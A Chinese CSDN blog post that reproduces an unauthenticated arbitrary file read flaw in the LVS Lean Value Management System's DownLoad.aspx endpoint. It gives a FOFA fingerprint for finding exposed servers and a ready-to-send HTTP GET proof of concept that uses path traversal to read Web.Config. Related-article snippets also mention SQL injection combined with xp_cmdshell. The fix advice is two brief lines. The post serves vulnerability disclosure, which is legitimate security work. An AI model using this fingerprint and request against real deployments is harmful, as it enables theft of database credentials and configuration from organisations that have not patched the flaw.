LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现

已于 2024-05-22 13:11:42 修改
阅读量813 收藏
点赞数 14
分类专栏: 漏洞复现 文章标签: lvs 安全 web安全
于 2024-05-22 13:11:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139117363
版权

0x01 产品简介

LVS精益价值管理系统是杭州吉拉科技有限公司研发的一款专注于企业精益化管理和价值流优化的解决方案。该系统通过集成先进的数据分析工具、可视化的价值流映射技术和灵活的流程改善机制,帮助企业实现高效、低耗、高质量的生产和服务。

0x02 漏洞概述

LVS精益价值管理系统 DownLoad.aspx 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

0x04 漏洞复现 

PoC

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0x05 修复建议 

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
LVS价值管理系统 LVS.Web.ashx SQL注入漏洞
0xSec
05-22 490
LVS价值管理系统 /ajax/LVS.Web.AgencytaskList,LVS.Web.ashx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修
漏洞LVS价值管理系统 DownLoad.aspx 任意文件读取漏洞
siu~
05-22 203
`LVS`价值管理系统 `DownLoad.aspx` 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件
价值管理系统 DownLoad.aspx存在任意文件读取漏洞
qq_39894062的博客
05-24 725
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!该系统通过集成先进的数据分析工具、可视化的价值流映射技术和灵活的流程改善机制,帮助企业实高效、低耗、高质量的生产和服务。本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
LVS价值管理系统存在SQL注入漏洞
weixin_43167326的博客
05-23 846
LVS价值管理系统是由杭州吉拉科技有限公司开发的一款产品,LVS(Lean Value Stream)价值管理系统是一种旨在提高组织运营效率和降低成本的管理方法。该系统基于生产(Lean Production)思想,旨在 eliminator waste、maximize value和improve flow,其广泛应用于制造业、服务业、医疗业、金融业等领域,帮助组织提高运营效率、降低成本、改善质量和提高员工参与度。
Failed to start LVS and VRRP High Availability Monitor.
风水道人
07-24 4715
Failed to start LVS and VRRP High Availability Monitor.
【python毕业设计】Django框架实学生信息管理系统
热门推荐
Allen . Liu
08-10 3万+
Django框架实学生信息管理系统 总体概括 注册流程 首先进行输入用户名(邮箱)、密码以及验证码,输入完之后点击注册按钮。如果输入的不正确,提示错误信息。 如果一切信息填写正确无误,调用STMP模块发送激活邮件,用户必须要点击接收到邮箱链接,进行邮件激活后才方可登陆。 即使注册成功,没有激活的用户也不能登陆,用户以get的方式直接重定向到注册页面。 ...
【Cadence】LVS报错:Expected “.PARAM name1=value1 <name2=value2 <...>>“
乾巽的博客
12-14 2191
cadence calibre LVS Expected ".PARAM name1=value1 "
LVS-系统配置的参数net.ipv4.tcp_keepalive_time不生效
砚墨
07-29 2682
使用LVS做负载配置参数net.ipv4.tcp_keepalive_time不生效 问题: 为了节省TCP连接时间,我们选择建立几个固定的TCP长连接,然后把所有的消息平均分配的这几个TCP通道上传送给对方。 另一种情况:客户端和服务端之间是一个会话,要隔一段时间发个心跳。 在出了第三种情况,我是一个代理程序,要转发一个会话,让服务端和客户端都无感知;而且多个会话可以用一个通路 (1)我需要在会话建立之前就建立连接; (2)没设计代理的心跳接口,我不能自己给后端发心跳; 但代理和后端之间隔着LVS
天涯LVS管理系统.zip
03-16
天涯LVS管理系统.zip
天涯LVS管理系统 v1.0.zip
07-06
天涯LVS管理系统是一个很方便管理LVS Keepalived负载均衡平台的B/S软件。   一、开发包 •func •certmaster •mysql5.0 •LAMP/LNMP CodeIgniter框架 •rrdtool •lvs-rrd   二、角色分配 •LVS...
lvs-manager:lvs网站管理系统
03-11
lvs-manager是lvs cluster的Web管理系统。关于lvs cluster的架构这里 功能 性能图标 lvs累积整体流量 各vip的流量 lvs整合整体包数量 各vip的包数量 lvs管理 页面配置上线,下线,修改,回滚,发布服 管理保持活力 ...
LVS深入及NAT集群调试.pptx
10-21
LVS深入及NAT集群调试
部署LVS—DR群集
zx52306的博客
06-11 811
【代码】部署LVS—DR群集。
部署LVS-DR模式(附带详细实验)
F12138X的博客
06-11 850
盛年不重来,一日难再晨
LVS+Keepalived NGINX+Keepalived 高可用群集实战部署
Vince15dvd的博客
06-12 1243
Keepalived及其工作原理Keepalived 是一个基于VRRP协议来实LVS服务高可用方案,可以解决静态路由出的单点故障问题。
LVS负载均衡集群企业级应用实战-LVS-DR(四)
最新发布
Lzcsfg的博客
06-14 668
在windows中应访问VIP,即192.168.226.136,打开即可看到信息,多次刷新,也可看到两个主机会切换。配置默认路由,这个IP就是虚拟主机中另一个nat模式的IP,这个IP要和真实服务器在同一个网段,这样才可以通信。三台虚拟机,统一关闭防火墙和selinux,配置好YUM源。添加虚拟服务器和真实服务器,并设置算法,这里用rr,然后保存规则。在设置中添加一块网卡,两个网卡都使用NAT模式,然后打开虚拟机。确保打开路由转发,加载sysctl.conf配置。查看ip,有两个不同网段IP就成功了。
部署LVS-DR群集...
qq_64335866的博客
06-11 136
disabled。
lvs中的错误LVS completed. INCORRECT. See report file: bisai.lvs.report如何更改
06-02
LVS(Linux Virtual Server)是一个高性能、可伸缩、高可用的服务器集群软件,该软件提供了四种负载均衡方式:NAT、DR、TUN和FULLNAT,可以有效地提高服务器的性能和可用性。在使用 LVS 进行负载均衡时,如果出错误 LVS completed. INCORRECT. See report file: bisai.lvs.report,可以按照以下步骤进行修: 1. 查看 bisai.lvs.report 文件中的具体错误信息,根据错误信息进行修。 2. 如果 bisai.lvs.report 文件中的错误信息无法解决问题,可以尝试修改 /etc/ha.d/lvs.cf 文件中的配置,重新启动 LVS 服务。 3. 修改完配置文件后,使用以下命令重启 LVS 服务: service lvs restart 4. 然后再次测试 LVS 是否正常工作,如果仍然出错误,可以查看系统日志文件,查找更详细的错误信息,进行修。 注意:在修改 LVS 配置文件时,需要先备份原始文件,以免出不可预料的错误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值